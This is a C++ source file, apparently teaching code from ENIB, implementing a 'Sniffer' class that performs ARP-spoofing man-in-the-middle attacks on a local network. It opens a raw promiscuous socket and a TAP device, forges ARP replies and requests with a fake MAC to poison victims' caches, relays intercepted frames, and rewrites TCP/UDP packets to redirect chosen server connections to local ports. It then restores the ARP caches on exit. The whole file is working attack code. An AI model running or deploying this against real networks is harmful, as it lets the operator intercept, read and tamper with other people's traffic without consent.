//----------------------------------------------------------------------------
// Copyright (c) 2007-2008 Fabrice HARROUET (ENIB)
//
// Permission to use, copy, modify, distribute and sell this software
// and its documentation for any purpose is hereby granted without fee,
// provided that the above copyright notice appear in all copies and
// that both that copyright notice and this permission notice appear
// in supporting documentation.
// The author makes no representations about the suitability of this
// software for any purpose.
// It is provided "as is" without express or implied warranty.
//----------------------------------------------------------------------------

#include "sniffer.h"

#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>

#include <netinet/ether.h>
#include <netinet/in.h>
#include <net/if.h>
#include <netpacket/packet.h>

//-----------------------------------------------

#include <fcntl.h>
#include <sys/stat.h>
#include <linux/if_tun.h>

int tapFd=-1;

//-----------------------------------------------

bool Sniffer::_stopLoop=false;

Sniffer::Sniffer(double repeatDelay,
                 const string & ifName,
                 uint64_t fakeMac,
                 uint32_t toIp,
                 const vector<uint32_t> & fromIp,
                 const vector<Sniffer::Capture> & tcpCapture,
                 const vector<Sniffer::Capture> & udpCapture)
: _repeatDelay(repeatDelay),
  _ifName(ifName),
  _controlFd(-1),
  _ethFd(-1),
  _tapFd(-1),
  _mtu(0),
  _frame((uint8_t *)0),
  _fakeMac(fakeMac),
  _netAddr(0),
  _netMask(0),
  _local(0,0),
  _to(toIp,0),
  _collectFrom(fromIp.empty()),
  _from(),
  _tcpServers(),
  _udpServers()
{
srand((uint32_t)Sniffer::getTime());
int r;
RESTART_SYSCALL(_controlFd,socket(PF_INET,SOCK_DGRAM,0));
if(_controlFd==-1)
  {
  cerr << "Cannot create control socket --- " << strerror(errno) << endl;
  return;
  }
_ethFd=Sniffer::_openInterface(ifName,true,_mtu,_local.mac,_local.ip,_netMask);
if(_ethFd==-1)
  {
  RESTART_SYSCALL(r,close(_controlFd));
  _controlFd=-1;
  return;
  }
_netAddr=_local.ip&_netMask;
_frame=new uint8_t[EthFrame::HEADER_SIZE+_mtu];
_tapFd=Sniffer::_openTap(_controlFd,_local.mac,_mtu,_local.ip);
if(_tapFd==-1)
  {
  RESTART_SYSCALL(r,close(_controlFd));
  _controlFd=-1;
  return;
  }
bool fail=false;
size_t i;
if(_to.ip==_local.ip)
  {
  cerr << IpPacket::showIpAddr(_to.ip)
       << " is the local address of " << ifName << endl;
  fail=true;
  }
if((_to.ip&_netMask)!=_netAddr)
  {
  cerr << IpPacket::showIpAddr(_to.ip) << " is not in "
       << IpPacket::showIpAddr(_netAddr) << "/" 
       << IpPacket::netmaskWidth(_netMask) << endl;
  fail=true;
  }
for(i=0;i<fromIp.size();++i)
  {
  if(fromIp[i]==_local.ip)
    {
    cerr << IpPacket::showIpAddr(fromIp[i])
         << " is the local address of " << ifName << endl;
    fail=true;
    }
  else if(fromIp[i]==_to.ip)
    {
    cerr << IpPacket::showIpAddr(fromIp[i])
         << " is used as source and destination" << endl;
    fail=true;
    }
  else if(!_getFromArp(fromIp[i]))
    {
    if((fromIp[i]&_netMask)==_netAddr)
      {
      _from.push_back(Sniffer::ArpInfo(fromIp[i],0));
      }
    else
      {
      cerr << IpPacket::showIpAddr(fromIp[i]) << " is not in "
           << IpPacket::showIpAddr(_netAddr) << "/" 
           << IpPacket::netmaskWidth(_netMask) << endl;
      fail=true;
      }
    }
  }
for(i=0;i<tcpCapture.size();++i)
  {
  bool found=false;
  for(size_t j=_tcpServers.size();j--;)
    {
    if((_tcpServers[j].realIp==tcpCapture[i].serverIp)&&
       (_tcpServers[j].realPort==tcpCapture[i].serverPort))
      {
      cerr << "Multiple TCP captures for "
           << IpPacket::showIpAddr(tcpCapture[i].serverIp)
           << ":" << tcpCapture[i].serverPort << endl;
      fail=true;
      found=true;
      break;
      }
    }
  if(!found)
    {
    _tcpServers.push_back(Sniffer::ServerInfo(tcpCapture[i].serverIp,
                                              tcpCapture[i].serverPort,
                                              tcpCapture[i].localPort));
    }
  }
for(i=0;i<udpCapture.size();++i)
  {
  bool found=false;
  for(size_t j=_udpServers.size();j--;)
    {
    if((_udpServers[j].realIp==udpCapture[i].serverIp)&&
       (_udpServers[j].realPort==udpCapture[i].serverPort))
      {
      cerr << "Multiple UDP captures for "
           << IpPacket::showIpAddr(udpCapture[i].serverIp)
           << ":" << udpCapture[i].serverPort << endl;
      fail=true;
      found=true;
      break;
      }
    }
  if(!found)
    {
    _udpServers.push_back(Sniffer::ServerInfo(udpCapture[i].serverIp,
                                              udpCapture[i].serverPort,
                                              udpCapture[i].localPort));
    }
  }
if(fail)
  {
  RESTART_SYSCALL(r,close(_controlFd));
  _controlFd=-1;
  return;
  }
}

Sniffer::~Sniffer(void)
{
int r;
if(_frame)
  {
  delete[] _frame;
  }
if(_controlFd!=-1)
  {
  RESTART_SYSCALL(r,close(_controlFd));
  }
if(_ethFd!=-1)
  {
  RESTART_SYSCALL(r,close(_ethFd));
  }
if(_tapFd!=-1)
  {
  RESTART_SYSCALL(r,close(_tapFd));
  }
}

bool // success
Sniffer::sendFrame(const EthFrame & eth)
{
int r;
int fd=(eth.readDstMac()==_local.mac ? _tapFd : _ethFd);
size_t frameSize=eth.getSize();
if(frameSize>EthFrame::HEADER_SIZE+_mtu)
  {
  frameSize=EthFrame::HEADER_SIZE+_mtu;
  }       
if(frameSize>=EthFrame::MIN_FRAME_SIZE)
  {
  RESTART_SYSCALL(r,write(fd,eth.getPtr(),frameSize));
  }
else
  {
  uint8_t padding[EthFrame::MIN_FRAME_SIZE];
  memcpy(padding,eth.getPtr(),frameSize);
  memset(padding+frameSize,'~',EthFrame::MIN_FRAME_SIZE-frameSize);
  RESTART_SYSCALL(r,write(fd,padding,EthFrame::MIN_FRAME_SIZE));
  }
return r!=-1;
}

bool // success
Sniffer::mainLoop(void)
{
if((_controlFd==-1)||
   !_detectOriginalMacAddresses(0.5,6))
  {
  return false;
  }
int r;
EthFrame eth((uint8_t *)0,0);
double deadline=Sniffer::getTime();
Sniffer::_stopLoop=false;
struct sigaction act;
memset(&act,0,sizeof(struct sigaction));
act.sa_handler=&Sniffer::_handler;
RESTART_SYSCALL(r,sigaction(SIGHUP,&act,(struct sigaction *)0));
RESTART_SYSCALL(r,sigaction(SIGINT,&act,(struct sigaction *)0));
RESTART_SYSCALL(r,sigaction(SIGQUIT,&act,(struct sigaction *)0));
RESTART_SYSCALL(r,sigaction(SIGTERM,&act,(struct sigaction *)0));
while(!Sniffer::_stopLoop)
  {
  double remaining=deadline-Sniffer::getTime();
  if(remaining<0.0)
    {
    remaining=0.0;
    }
  if(!_nextFrame(eth,remaining))
    {
    goto restoreArp;
    }
  if(eth.getSize())
    {
    switch(eth.readEthProto())
      {
      case EthFrame::PROTO_ARP:
        {
        ArpPacket arp(eth);
        if((arp.readHwType()==ArpPacket::HWTYPE_ETH)&&
           (arp.readProtoType()==ArpPacket::PROTOTYPE_IP)&&
           (arp.readHwSize()==ArpPacket::HWSIZE_ETH)&&
           (arp.readProtoSize()==ArpPacket::PROTOSIZE_IP))
          {
          uint32_t srcIp=arp.readSrcProto();
          uint64_t srcMac=arp.readSrcHw();
          uint32_t dstIp=arp.readDstProto();
          uint64_t dstMac=arp.readDstHw();
          _updateArpCache(srcIp,srcMac);
          _updateArpCache(dstIp,dstMac);
          if(arp.readOperation()==ArpPacket::ARP_REQUEST)
            {
            if(srcIp==_to.ip)
              {
              uint64_t mac=_getFromMac(dstIp);
              if(mac)
                {
                cerr << "Arp request from " << IpPacket::showIpAddr(srcIp)
                     << " for " << IpPacket::showIpAddr(dstIp) << endl;;
                _sendArp(ArpPacket::ARP_REPLY,_fakeMac,dstIp,
                                              _to.mac,srcIp);
                }
              }
            else if(dstIp==_to.ip)
              {
              uint64_t mac=_getFromMac(srcIp);
              if(mac)
                {
                cerr << "Arp request from " << IpPacket::showIpAddr(srcIp)
                     << " for " << IpPacket::showIpAddr(dstIp) << endl;;
                _sendArp(ArpPacket::ARP_REPLY,_fakeMac,dstIp,
                                              mac,srcIp);
                }
              }
            }
          else
            {
            if(srcIp==_to.ip)
              {
              Sniffer::ArpInfo * info=_getFromArp(dstIp);
              if(info)
                {
                size_t nb=info->pending.size();
                for(size_t i=0;i<nb;i++)
                  {
                  sendFrame(*(info->pending[i]));
                  delete info->pending[i];
                  }
                info->pending.clear();
                info->deadline=Sniffer::getTime()+_randomDelay();
                }
              }
            }
          }
        break;
        }
      case EthFrame::PROTO_IP:
        {
        if(eth.readDstMac()==_fakeMac)
          {
          IpPacket ip(eth);
          uint32_t srcIp=ip.readSrcIp();
          uint64_t srcMac=eth.readSrcMac();
          uint32_t dstIp=ip.readDstIp();
          uint64_t dstMac=eth.readDstMac();
          _updateArpCache(srcIp,srcMac);
          _updateArpCache(dstIp,dstMac);
          bool transmitPacket=true;
          uint8_t ipProto=ip.readIpProto();
          switch(ipProto)
            {
            case IpPacket::PROTO_TCP:
            case IpPacket::PROTO_UDP:
              {
              TcpSegment tcp(ip);
              UdpDatagram udp(ip);
              uint16_t srcPort;
              uint16_t dstPort;
              vector<Sniffer::ServerInfo> * servers;
              if(ipProto==IpPacket::PROTO_TCP)
                {
                srcPort=tcp.readSrcPort();
                dstPort=tcp.readDstPort();
                servers=&_tcpServers;
                }
              else
                {
                srcPort=udp.readSrcPort();
                dstPort=udp.readDstPort();
                servers=&_udpServers;
                }
              cerr << IpPacket::showIpAddr(srcIp) << ":" << srcPort
                   << " --> " << IpPacket::showIpAddr(dstIp) << ":" << dstPort
                   << endl;
              for(size_t i=servers->size();i--;)
                {
                Sniffer::ServerInfo * server=&((*servers)[i]);
                if((dstIp==server->realIp)&&(dstPort==server->realPort))
                  {
                  Sniffer::ClientInfo * client=(Sniffer::ClientInfo *)0;
                  for(size_t j=server->clients.size();j--;)
                    {
                    Sniffer::ClientInfo * info=&(server->clients[j]);
                    if((srcIp==info->ip)&&(srcPort==info->port))
                      {
                      client=info;
                      break;
                      }
                    }
                  if(!client)
                    {
                    server->clients.push_back(Sniffer::ClientInfo(srcIp,
                                                                  srcPort));
                    _changeLocalArp(srcIp,_fakeMac,ATF_COM|ATF_PERM);
                    client=&(server->clients.back());
                    }
                  ip.writeDstIp(_local.ip);
                  if(ipProto==IpPacket::PROTO_TCP)
                    {
                    tcp.writeDstPort(server->fakePort);
                    tcp.writeTcpChecksum(tcp.computeTcpChecksum(ip));
                    }
                  else
                    {
                    udp.writeDstPort(server->fakePort);
                    udp.writeUdpChecksum(udp.computeUdpChecksum(ip));
                    }
                  ip.writeIpChecksum(ip.computeIpChecksum());
                  eth.writeSrcMac(_fakeMac);
                  eth.writeDstMac(_local.mac);
                  sendFrame(eth);
                  transmitPacket=false;
                  break;
                  }
                else if((srcIp==_local.ip)&&(srcPort==server->fakePort))
                  {
                  for(size_t j=server->clients.size();j--;)
                    {
                    Sniffer::ClientInfo * client=&(server->clients[j]);
                    if((dstIp==client->ip)&&(dstPort==client->port))
                      {
                      ip.writeSrcIp(server->realIp);
                      if(ipProto==IpPacket::PROTO_TCP)
                        {
                        tcp.writeSrcPort(server->realPort);
                        tcp.writeTcpChecksum(tcp.computeTcpChecksum(ip));
                        }
                      else
                        {
                        udp.writeSrcPort(server->realPort);
                        udp.writeUdpChecksum(udp.computeUdpChecksum(ip));
                        }
                      ip.writeIpChecksum(ip.computeIpChecksum());
                      eth.writeSrcMac(_fakeMac);
                      eth.writeDstMac(_getFromMac(dstIp)); // always found ?
                      sendFrame(eth);
                      transmitPacket=false;
                      break;
                      }
                    }
                  break;
                  }
                }
              break;
              }
            }
          if(transmitPacket&&processPacket(eth,ip))
            {
            // FIXME: when using -tcp, connections between a redirected
            //        client and localhost are broken
            if(srcMac==_local.mac)
              {
              if(dstIp==_to.ip) // local --> to
                {
                eth.writeDstMac(_to.mac);
                sendFrame(eth);
                }
              else
                {
                uint64_t realDstMac=_getFromMac(dstIp);
                if(realDstMac) // local --> from
                  {
                  eth.writeDstMac(realDstMac);
                  sendFrame(eth);
                  }
                }
              }
            else if(srcMac==_to.mac)
              {
              if(dstIp==_local.ip) // to --> local
                {
                eth.writeDstMac(_local.mac);
                sendFrame(eth);
                }
              else
                {
                uint64_t realDstMac=_getFromMac(dstIp);
                if(realDstMac) // to --> from
                  {
                  eth.writeSrcMac(_fakeMac);
                  eth.writeDstMac(realDstMac);
                  sendFrame(eth);
                  }
                }
              }
            else
              {
              if(dstIp==_local.ip) // from --> local
                {
                cerr << "--- RECV ON LOCAL" << endl;
                eth.writeDstMac(_local.mac);
                sendFrame(eth);
                }
              else
                {
                uint64_t realDstMac=_getFromMac(dstIp);
                if(realDstMac) // from --> from
                  {
                  eth.writeSrcMac(_fakeMac);
                  eth.writeDstMac(realDstMac);
                  sendFrame(eth);
                  }
                else // assume from --> to
                  {
                  Sniffer::ArpInfo * info=_getFromArp(srcIp);
                  if(info)
                    {
                    eth.writeSrcMac(_fakeMac);
                    eth.writeDstMac(_to.mac);
                    if(Sniffer::getTime()<info->deadline)
                      {
                      sendFrame(eth);
                      }
                    else
                      {
                      _sendArp(ArpPacket::ARP_REQUEST,_fakeMac,srcIp,
                                                      _to.mac,_to.ip);
                      info->pending.push_back(new EthFrame(eth.getSize()));
                      memcpy(info->pending.back()->accessPtr(),
                             eth.getPtr(),eth.getSize());
                      }
                    }
                  }
                }
              }
            }
          }
        break;
        }
      }
    }
  if(Sniffer::getTime()>=deadline)
    {
    for(size_t i=_from.size();i--;)
      {
      _sendArp(ArpPacket::ARP_REQUEST,_fakeMac,_to.ip,
                                      _from[i].mac,_from[i].ip);
      }
    deadline+=_randomDelay();
    }
  }
restoreArp:
size_t i,j;
for(i=_from.size();i--;)
  {
  _sendArp(ArpPacket::ARP_REQUEST,_from[i].mac,_from[i].ip,
                                  _to.mac,_to.ip);
  _sendArp(ArpPacket::ARP_REQUEST,_to.mac,_to.ip,
                                  _from[i].mac,_from[i].ip);
  }
for(i=_tcpServers.size();i--;)
  {
  const Sniffer::ServerInfo * server=&(_tcpServers[i]);
  for(j=server->clients.size();j--;)
    {
    const Sniffer::ClientInfo * client=&(server->clients[j]);
    _changeLocalArp(client->ip,_getFromMac(client->ip),ATF_COM);
    }
  }
for(i=_udpServers.size();i--;)
  {
  const Sniffer::ServerInfo * server=&(_udpServers[i]);
  for(j=server->clients.size();j--;)
    {
    const Sniffer::ClientInfo * client=&(server->clients[j]);
    _changeLocalArp(client->ip,_getFromMac(client->ip),ATF_COM);
    }
  }
return true;
}

bool // allow transfert
Sniffer::processPacket(EthFrame & /* eth */,
                       IpPacket & /* ip */)
{
return true;
}

double // current time in seconds
Sniffer::getTime(void) // static
{
struct timeval tv;
gettimeofday(&tv,(struct timezone *)0);
return tv.tv_sec+tv.tv_usec*1e-6;
}

double // delay in seconds
Sniffer::_randomDelay(void)
{
return _repeatDelay*(0.5+rand()/(RAND_MAX+1.0));
}

Sniffer::ArpInfo * // arp info or 0
Sniffer::_getFromArp(uint32_t ip)
{
for(size_t i=_from.size();i--;)
  {
  if(_from[i].ip==ip)
    {
    return &_from[i];
    }
  }
return (Sniffer::ArpInfo *)0;
}

uint64_t // mac address or 0
Sniffer::_getFromMac(uint32_t ip)
{
Sniffer::ArpInfo * info=_getFromArp(ip);
return info ? info->mac : 0;
}

bool // success
Sniffer::_changeLocalArp(uint32_t ip,
                         uint64_t mac,
                         int flags)
{
int r;
struct arpreq arp;
memset(&arp,0,sizeof(struct arpreq));
((struct sockaddr_in *)(&arp.arp_pa))->sin_family=AF_INET;
((struct sockaddr_in *)(&arp.arp_pa))->sin_addr.s_addr=htonl(ip);
arp.arp_ha.sa_family=ARPHRD_ETHER;
DataPacket::writeUint48((uint8_t *)arp.arp_ha.sa_data,mac);
arp.arp_flags=flags;
strncpy(arp.arp_dev,_ifName.c_str(),sizeof(arp.arp_dev));
RESTART_SYSCALL(r,ioctl(_controlFd,SIOCSARP,&arp));
if(r==-1)
  {
  cerr << "Cannot set ARP --- " << strerror(errno) << endl;
  }
return true;
}

void
Sniffer::_sendArp(uint16_t operation,
                  uint64_t srcMac,
                  uint32_t srcIp,
                  uint64_t dstMac,
                  uint32_t dstIp)
{
EthFrame eth(EthFrame::HEADER_SIZE+ArpPacket::HEADER_SIZE);
eth.writeEthHeader(dstMac ? dstMac : EthFrame::MAC_BROADCAST,
                   _fakeMac,EthFrame::PROTO_ARP);
ArpPacket arp(eth);
arp.writeArpHeader(ArpPacket::HWTYPE_ETH,
                   ArpPacket::PROTOTYPE_IP,
                   ArpPacket::HWSIZE_ETH,
                   ArpPacket::PROTOSIZE_IP,
                   operation,
                   srcMac,
                   srcIp,
                   operation==ArpPacket::ARP_REQUEST ? 0 : dstMac,
                   dstIp);
sendFrame(eth); 
}

bool // success
Sniffer::_nextFrame(EthFrame & ethOut,
                    double timeout)
{
int r;
fd_set rdSet;
FD_ZERO(&rdSet);
FD_SET(_ethFd,&rdSet);
FD_SET(_tapFd,&rdSet);
struct timeval tv;
tv.tv_sec=(int)timeout;
tv.tv_usec=(int)((timeout-tv.tv_sec)*1e6);
int maxFd=_ethFd>_tapFd ? _ethFd : _tapFd;
RESTART_SYSCALL(r,select(maxFd+1,&rdSet,(fd_set *)0,(fd_set *)0,&tv));
if(r==-1)
  {
  cerr << "select: " << strerror(errno) << endl;
  return false;
  }
if(FD_ISSET(_ethFd,&rdSet))
  {
  RESTART_SYSCALL(r,read(_ethFd,_frame,EthFrame::HEADER_SIZE+_mtu));
  if(r==-1)
    {
    cerr << "read: " << strerror(errno) << endl;
    return false;
    }
  ethOut.reinit(_frame,r);
  }
else if(FD_ISSET(_tapFd,&rdSet))
  {
  RESTART_SYSCALL(r,read(_tapFd,_frame,EthFrame::HEADER_SIZE+_mtu));
  if(r==-1)
    {
    cerr << "read: " << strerror(errno) << endl;
    return false;
    }
  ethOut.reinit(_frame,r);
  }
else
  {
  ethOut.reinit((uint8_t *)0,0);
  }
return true;
}

void
Sniffer::_updateArpCache(uint32_t ip,
                         uint64_t mac)
{
if(mac&&(mac!=EthFrame::MAC_BROADCAST)&&(mac!=_fakeMac))
  {
  if(ip==_to.ip)
    {
    if(_to.mac!=mac)
      {
      cerr << "Changing Target " << IpPacket::showIpAddr(ip) << " / "
                                 << EthFrame::showMacAddr(mac) << endl;
      }
    _to.mac=mac;
    }
  else
    {
    for(size_t i=_from.size();i--;)
      {
      if(_from[i].ip==ip)
        {
        if(_from[i].mac!=mac)
          {
          cerr << "Changing " << IpPacket::showIpAddr(ip) << " / "
                              << EthFrame::showMacAddr(mac) << endl;
          }
        _from[i].mac=mac;
        return;
        }
      }
    if(_collectFrom&&((ip&_netMask)==_netAddr))
      {
      cerr << "Adding " << IpPacket::showIpAddr(ip) << " / "
                        << EthFrame::showMacAddr(mac) << endl;
      _from.push_back(Sniffer::ArpInfo(ip,mac));
      }
    }
  }
}

bool // success
Sniffer::_detectOriginalMacAddresses(double interval,
                                     size_t attempts)
{
double nextTime=Sniffer::getTime();
for(;;)
  {
  EthFrame eth((uint8_t *)0,0);
  double remaining=nextTime-Sniffer::getTime();
  if(remaining<0.0)
    {
    remaining=0.0;
    }
  if(!_nextFrame(eth,remaining))
    {
    return false;
    }
  if(eth.getSize())
    {
    if(eth.readEthProto()==EthFrame::PROTO_ARP)
      {
      ArpPacket arp(eth);
      if((arp.readHwType()==ArpPacket::HWTYPE_ETH)&&
         (arp.readProtoType()==ArpPacket::PROTOTYPE_IP)&&
         (arp.readHwSize()==ArpPacket::HWSIZE_ETH)&&
         (arp.readProtoSize()==ArpPacket::PROTOSIZE_IP))
        {
        _updateArpCache(arp.readSrcProto(),arp.readSrcHw());
        _updateArpCache(arp.readDstProto(),arp.readDstHw());
        }
      }
    }
  if(_to.mac)
    {
    if(_collectFrom)
      {
      return true;
      }
    else
      {
      bool done=true;
      for(size_t i=_from.size();i--;)
        {
        if(!_from[i].mac)
          {
          done=false;
          break;
          }
        }
      if(done)
        {
        return true;
        }
      }
    }
  if(Sniffer::getTime()>=nextTime)
    {
    if(!attempts--)
      {
      if(!_to.mac)
        {
        cerr << "Missing MAC for " << IpPacket::showIpAddr(_to.ip) << endl;
        }
      if(!_collectFrom)
        {
        for(size_t i=_from.size();i--;)
          {
          if(!_from[i].mac)
            {
            cerr << "Missing MAC for "
                 << IpPacket::showIpAddr(_from[i].ip) << endl;
            }
          }
        }
      return false;
      }
    if(!_to.mac)
      {
      _sendArp(ArpPacket::ARP_REQUEST,_local.mac,_local.ip,0x0,_to.ip);
      }
    if(_collectFrom)
      {
      for(uint32_t addr=1;addr<~_netMask;addr++)
        {
        uint32_t ip=_netAddr|addr;
        if((ip!=_to.ip)&&(ip!=_local.ip)&&!_getFromArp(ip))
          {
          _sendArp(ArpPacket::ARP_REQUEST,_local.mac,_local.ip,0x0,ip);
          }
        }
      }
    else
      {
      for(size_t i=_from.size();i--;)
        {
        if(!_from[i].mac)
          {
          _sendArp(ArpPacket::ARP_REQUEST,_local.mac,_local.ip,
                                          0x0,_from[i].ip);
          }
        }
      }
    nextTime+=interval;
    }
  }
return true;
}

int // fd or -1
Sniffer::_openTap(int controlFd,
                  uint64_t localMac,
                  size_t localMtu,
                  uint32_t localIp) // static
{
int r,fd;
const char * tunFile="/dev/net/tun";
RESTART_SYSCALL(fd,open(tunFile,O_RDWR));
if(fd==-1)
  {
  cerr << "Cannot open " << tunFile << ": " << strerror(errno) << endl;
  return -1;
  }
struct ifreq ifr;
memset(&ifr,0,sizeof(struct ifreq));
ifr.ifr_flags=IFF_TAP|IFF_NO_PI;
ifr.ifr_name[0]='\0';
RESTART_SYSCALL(r,ioctl(fd,TUNSETIFF,&ifr));
if(r==-1)
  {
  cerr << "ioctl TUNSETIFF: " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
string name=ifr.ifr_name;
//---- set MAC address ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
ifr.ifr_hwaddr.sa_family=ARPHRD_ETHER;
DataPacket::writeUint48((uint8_t *)ifr.ifr_hwaddr.sa_data,localMac);
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFHWADDR,&ifr));
if(r==-1)
  {
  cerr << "Cannot set MAC address on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
//---- set MTU ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
ifr.ifr_mtu=localMtu;
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFMTU,&ifr));
if(r==-1)
  {
  cerr << "Cannot set MTU on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
//---- set IP address ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
((struct sockaddr_in *)&ifr.ifr_addr)->sin_family=AF_INET;
((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr.s_addr=htonl(localIp);
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFADDR,&ifr));
if(r==-1)
  {
  cerr << "Cannot set IP address on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
//---- set netmask ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
((struct sockaddr_in *)&ifr.ifr_netmask)->sin_family=AF_INET;
((struct sockaddr_in *)&ifr.ifr_netmask)->sin_addr.s_addr=0xFFFFFFFF;
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFNETMASK,&ifr));
if(r==-1)
  {
  cerr << "Cannot set IP netmask on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
//---- set point to point address ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
((struct sockaddr_in *)&ifr.ifr_dstaddr)->sin_family=AF_INET;
((struct sockaddr_in *)&ifr.ifr_dstaddr)->sin_addr.s_addr=htonl(localIp);
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFDSTADDR,&ifr));
if(r==-1)
  {
  cerr << "Cannot set point to point address on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
//---- set flags ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(controlFd,SIOCGIFFLAGS,&ifr));
if(r==-1)
  {
  cerr << "Cannot get flags on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
ifr.ifr_flags|=IFF_UP;
ifr.ifr_flags|=IFF_RUNNING;
ifr.ifr_flags|=IFF_POINTOPOINT;
RESTART_SYSCALL(r,ioctl(controlFd,SIOCSIFFLAGS,&ifr));
if(r==-1)
  {
  cerr << "Cannot set flags on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
return fd;
}

int // fd or -1
Sniffer::_openInterface(const string & name,
                        bool promiscuous,
                        size_t & mtuOut,
                        uint64_t & localMacOut,
                        uint32_t & localIpOut,
                        uint32_t & netMaskOut) // static
{
//---- create socket ----
int fd,r;
RESTART_SYSCALL(fd,socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)));
if(fd==-1)
  {
  cerr << "Cannot create PACKET socket --- " << strerror(errno) << endl;
  return -1;
  }
//---- find interface index ----
struct ifreq ifr;
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(fd,SIOCGIFINDEX,&ifr));
if(r==-1)
  {
  cerr << "Cannot find interface index for " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
int index=ifr.ifr_ifindex;
//---- bind socket to interface ----
struct sockaddr_ll addr;
memset(&addr,0,sizeof(struct sockaddr_ll));
addr.sll_family=AF_PACKET;
addr.sll_ifindex=index;
addr.sll_protocol=htons(ETH_P_ALL);
RESTART_SYSCALL(r,bind(fd,(struct sockaddr *)&addr,
                          sizeof(struct sockaddr_ll)));
if(r==-1)
  {
  cerr << "Cannot bind socket to interface " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
#if 0
//---- check pending errors ---- // usefull ???
int err;
socklen_t errlen=sizeof(int);
RESTART_SYSCALL(r,getsockopt(fd,SOL_SOCKET,SO_ERROR,&err,&errlen));
if(r==-1)
  {
  cerr << "Cannot check errors on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
if(err>0)
  {
  cerr << "Interface " << name << " has errors --- " << strerror(err) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
#endif 
//---- get MTU ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(fd,SIOCGIFMTU,&ifr));
if(r==-1)
  {
  cerr << "Cannot get MTU on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
mtuOut=ifr.ifr_mtu;
//---- get MAC address ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(fd,SIOCGIFHWADDR,&ifr));
if(r==-1)
  {
  cerr << "Cannot get MAC address on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
localMacOut=DataPacket::readUint48((const uint8_t *)ifr.ifr_hwaddr.sa_data);
//---- get IP address ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(fd,SIOCGIFADDR,&ifr));
if(r==-1)
  {
  cerr << "Cannot get IP address on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
localIpOut=ntohl(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr.s_addr);
//---- get netmask ----
memset(&ifr,0,sizeof(struct ifreq));
strncpy(ifr.ifr_name,name.c_str(),sizeof(ifr.ifr_name));
RESTART_SYSCALL(r,ioctl(fd,SIOCGIFNETMASK,&ifr));
if(r==-1)
  {
  cerr << "Cannot get netmask on " << name
       << " --- " << strerror(errno) << endl;
  RESTART_SYSCALL(r,close(fd));
  return -1;
  }
netMaskOut=ntohl(((struct sockaddr_in *)&ifr.ifr_netmask)->sin_addr.s_addr);
//---- set promiscuous mode ----
if(promiscuous)
  {
  struct packet_mreq mr;
  memset(&mr,0,sizeof(struct packet_mreq));
  mr.mr_ifindex=index;
  mr.mr_type=PACKET_MR_PROMISC;
  RESTART_SYSCALL(r,setsockopt(fd,SOL_PACKET,PACKET_ADD_MEMBERSHIP,
                               &mr,sizeof(struct packet_mreq)));
  if(r==-1)
    {
    cerr << "Cannot set promiscuous mode on " << name
         << " --- " << strerror(errno) << endl;
    RESTART_SYSCALL(r,close(fd));
    return -1;
    }
  }
return fd;
}

void
Sniffer::_handler(int /* signum */) // static
{
Sniffer::_stopLoop=true;
}

//----------------------------------------------------------------------------
